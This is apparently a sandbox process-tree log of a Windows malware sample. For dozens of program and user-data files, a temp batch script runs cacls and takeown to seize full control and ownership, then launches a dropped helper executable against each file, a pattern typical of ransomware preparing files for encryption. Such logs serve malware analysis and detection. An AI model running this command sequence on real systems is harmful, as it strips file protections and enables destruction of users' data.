C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "NBMapTIP.dll.mui" -nobanner3⤵PID:316
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "NBMapTIP.dll.mui" -nobanner4⤵PID:1808
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\Templates\Genko_2.jtp""2⤵PID:1476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Genko_2.jtp" /E /G Admin:F /C3⤵PID:1676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Genko_2.jtp"3⤵PID:1128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Genko_2.jtp" -nobanner3⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Genko_2.jtp" -nobanner4⤵PID:1980
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp""2⤵PID:1112
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G Admin:F /C3⤵PID:1584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"3⤵PID:232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "To_Do_List.jtp" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "To_Do_List.jtp" -nobanner4⤵PID:1152
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:1652
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵PID:316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:940
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1284
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵PID:1040
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C3⤵PID:1816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"3⤵PID:1688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "bl.gif" -nobanner3⤵PID:2008
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "bl.gif" -nobanner4⤵PID:608
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""2⤵PID:1052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C3⤵PID:620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"3⤵PID:1872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "end_review.gif" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "end_review.gif" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1376
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵PID:1808
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:2032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵
- Modifies file permissions
PID:1092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "open_original_form.gif" -nobanner3⤵PID:1284
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "open_original_form.gif" -nobanner4⤵PID:1984
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1836
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵PID:1120
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵PID:320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "review_email.gif" -nobanner3⤵PID:1076
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "review_email.gif" -nobanner4⤵PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵PID:1128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵PID:960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "stop_collection_data.gif" -nobanner3⤵PID:216
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "stop_collection_data.gif" -nobanner4⤵PID:208
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:236
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:2032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:1676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "superbar.png" -nobanner3⤵PID:1984
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "superbar.png" -nobanner4⤵PID:1868
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵PID:1500
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵PID:568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵PID:968
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵PID:608
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:1816
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵PID:1592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:796
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""2⤵PID:1128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C3⤵PID:1548
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"3⤵
- Modifies file permissions
PID:864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "MinionPro-Regular.otf" -nobanner3⤵PID:776
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "MinionPro-Regular.otf" -nobanner4⤵PID:1372
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""2⤵PID:900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"3⤵PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "zy______.pfm" -nobanner3⤵PID:1040
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "zy______.pfm" -nobanner4⤵PID:1076
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵PID:896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵
- Modifies file permissions
PID:1972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵PID:216
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵PID:208
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""2⤵PID:1980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C3⤵PID:820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"3⤵PID:1676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "brt55.ths" -nobanner3⤵PID:1144
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "brt55.ths" -nobanner4⤵PID:1868
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""2⤵PID:620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C3⤵PID:1476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"3⤵PID:568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "eng32.clx" -nobanner3⤵PID:1624
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "eng32.clx" -nobanner4⤵PID:608
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵PID:1504
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:1512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵PID:1592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "icudt26l.dat" -nobanner3⤵PID:472
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "icudt26l.dat" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵PID:1500
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C3⤵PID:1284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵
- Modifies file permissions
PID:864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "GREEK.TXT" -nobanner3⤵PID:1836
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "GREEK.TXT" -nobanner4⤵PID:1372
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵PID:1816
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:2008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "CP1250.TXT" -nobanner3⤵PID:1656
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "CP1250.TXT" -nobanner4⤵PID:1076
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:2016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵PID:1972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:1504
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:2032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵PID:864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1976
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:776
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:2008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Modifies file permissions
PID:856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "overlay.png" -nobanner3⤵PID:608
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "overlay.png" -nobanner4⤵PID:1656
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:1348
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:1008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"3⤵PID:208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:1212
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:1376
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1792
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:2032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵PID:864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "directories.acrodata" -nobanner3⤵PID:1092
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "directories.acrodata" -nobanner4⤵PID:1868
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:1800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:2008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
PID:856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "background.png" -nobanner3⤵PID:212
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "background.png" -nobanner4⤵PID:1076
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui""2⤵PID:1480
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" /E /G Admin:F /C3⤵PID:1008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui"3⤵PID:220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "PDIALOG.exe.mui" -nobanner3⤵PID:1376
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "PDIALOG.exe.mui" -nobanner4⤵PID:900
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1792
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\Templates\Graph.jtp""2⤵PID:1348
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Graph.jtp" /E /G Admin:F /C3⤵PID:316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Graph.jtp"3⤵PID:776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Graph.jtp" -nobanner3⤵PID:1976
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Graph.jtp" -nobanner4⤵PID:1092
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"3⤵PID:1656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:320
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:212
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:108
-
-
-
